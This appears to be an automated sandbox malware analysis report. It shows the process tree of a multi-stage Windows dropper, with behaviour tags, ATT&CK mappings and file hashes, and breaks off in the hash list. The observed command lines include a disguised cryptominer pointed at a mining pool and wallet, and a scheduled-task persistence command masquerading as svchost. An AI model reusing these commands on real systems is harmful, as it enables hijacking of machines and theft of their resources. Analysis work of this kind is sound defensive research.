firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C37F.tmp\C380.tmp\C381.bat C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffebe23cc40,0x7ffebe23cc4c,0x7ffebe23cc586⤵PID:752
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1940 /prefetch:26⤵PID:764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2192 /prefetch:36⤵PID:2636
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2600 /prefetch:86⤵PID:4308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3172 /prefetch:16⤵PID:5560
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3196 /prefetch:16⤵PID:5568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=844,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4348 /prefetch:86⤵
- Drops file in System32 directory
PID:7540 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebe0f46f8,0x7ffebe0f4708,0x7ffebe0f47186⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:26⤵PID:1064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:86⤵PID:1584
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:16⤵PID:2328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:16⤵PID:408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:16⤵PID:2648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 /prefetch:26⤵PID:7476
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"5⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53e5f022-890f-4641-bc25-6435b881c0a7} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" gpu7⤵PID:876
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bbd761e-7204-4378-bc7c-64570d4434fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" socket7⤵PID:4992
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3292 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fc26526-eabd-4dc7-9f61-97d1368d5d9a} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:3584
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 3200 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {328eb413-cf5c-4040-baf6-6352daf96de4} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:1224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4612 -prefMapHandle 4608 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {367c94ec-d0da-40e9-881f-6a57780e030e} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" utility7⤵
- Checks processor information in registry
PID:5760 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56b2e0f3-cc98-4896-8892-5958027b8893} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5180
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc51cbc-d576-46b5-9838-d03e866fba5b} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5468
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 5 -isForBrowser -prefsHandle 5800 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa4773f0-857f-4bd6-84d5-12fdc287b3fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"3⤵PID:5984
-
C:\Users\Admin\1000029002\a2f7c1badc.exe"C:\Users\Admin\1000029002\a2f7c1badc.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 10964⤵
- Program crash
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5224 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\pureee.exe"C:\Users\Admin\AppData\Local\Temp\pureee.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8348
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8164
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8900
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7992
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:9188
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:4228
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8136
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6728
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\adada.exe"C:\Users\Admin\AppData\Local\Temp\adada.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7868 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:7092 -
C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:8000 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"8⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:7412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5776
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5692 -ip 56921⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8964
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8956
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8564
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8548
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5e70b307e33e856cc9cb70a59a32102da
SHA124b6d3e99b0e5ee94b7b591c40f7ac2b0ba6f555
SHA2568d7e591c16734d05b2b7d4b074a16ce05dc89d904d63e6de9add91aaeef4cccd
SHA5120c59c31f54214c1875a9314f689346c4755371bfbbfd245f3c90a00cd32b3ff8a378fdcd1b4fd597a956b39d310e3b31993103990166013ff5c61c15e63aa50b
-
Filesize
264B
MD54c447d9a22a239031d1d821acdaef00f
SHA1de4ce15414eb958efabff7f0f4c5128b87e67dea
SHA256ad99e7a6e98824b51a3bf956abae449c5db8b6bc313558901c65fc74a3517386
SHA512f4e496c69a2f3e4e3389f845dcffed5f443e1a94e96fa9da3dccf103df3941a970dbca7dfa1bcea57c3dc75c7a8e2b990b5fd5996d7fe919edd4db3a85013ca6
-
Filesize
3KB
MD5b40dc8cb2b240002ad52493e03510f3c
SHA110f1ce164c4799cc09e7f51d2127e722b5afb486
SHA256a8ad89b39df780eb2dab94f3abb5f28661e0a5bbbd7dc4889558f92945f2e1cc
SHA512779be83187b521f40104bd57e6fb5c3cdd8458eaeb93962c89248399392d8de48c520c1d8e55e188795bea44498007329e74961521754653417403406fa4d606
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD53eba211daa81e6b79b6679845da69161
SHA16a5444f93a463bc30acf17e29e6d8168c62dd2e4
SHA25669e19a1df06edf6270dfe05ea0476ec4946be7bf31fc7fda7aa64217c02806cd
SHA512fa891ac204265be07800cea429721dd6751b1c39c9ea400271d189694eafebcc8c1de02596960f2207c82055521ee139f78b01abb38870c918541c9a5d0354f1
-
Filesize
8KB
MD5321a0fcc8d657654dfc62ce9032c5439
SHA1e6d8a6f358f8ff673a5cafd4d269c4887fe4b830
SHA25650f6f3f385da909806a38d36d0f2dbb150b1d9ff03fdb3c31c25540b68a05711
SHA512d036cd1b59497752f98b59b11f26f9e56650abc323ad390735f037c59acfb6b315c6a9d4a8013dd91446befe61dca70d492da7d42bdd8e335f63fcc9bc2015f0
-
Filesize
8KB
MD5523188d0fd86b4419a66c95d8028ea86
SHA11d4fc31b178d9fb334792eef8f092f3ffac6df2d
SHA256da7caddba65ef198a001dd754e04a6b9f014a58ca0abd2f70afc0c96a4ce201c
SHA512f4bf533c09b12433c16ae0de93aa633f2c20bce535c538b2598ec1244b2fffb209444550497f91d35a643d6032dc3c519568744a46b462f7259e1454651d262f
-
Filesize
8KB
MD53b55f4262dae7076b2368da9fafc403c
SHA1347a2c34f741dcfa0377d57b1bb45dce049add51
SHA256ae7344dc1b14ad5fa15165ced8becbc3dd59715715d722983f352682b8cab255
SHA512d727ee825ea6ae3307eaf9a1a2e36c5c3fc9ba5dc0b333538de0c64bfc1b1532f509eef27790a66d2d885a96108036d6dbf5681e2df3ea2ddd39817668260e6f
-
Filesize
8KB
MD5e58d5621e7ea63f97d08b3396998978d
SHA18a38560bb0f313c8405596468db086744aae29a5
SHA256f8f7a9f497b4f5c3bc3af271fe489a867570f4197fc732413d9fbe43439d0a83
SHA512a4e9daf7f5aa272e29377cbfe53ccefe08f0c6db7a3083225b3d8b82101c9c8c15229fe54ef0cb01a7c6649fa04ae0c441753582c5fca9365f4c23bf3853eb73
-
Filesize
8KB
MD55c84ad7c6a698656e2cac4247bac6cb8
SHA1556365880dd46ec1efc40d240058ab267d0ad53d
SHA2565c39a03cc2269466ba6cfd3a7cf5b4169ea913f15aed700796d146c1ea687a8e
SHA512d9865fe640ebd2e6fbf6eec1c615e84fab643c7566217552580ea7fb185451811e1b327dc5293f57c7196a9bcdc75b504c4cb6045edb09a93236f3c0452e7f37
-
Filesize
8KB
MD5ae31a3fffad542668f2ad22ff7cdfc13
SHA1456a50eec327af38e773fbb2e2a529c4f8b7056d
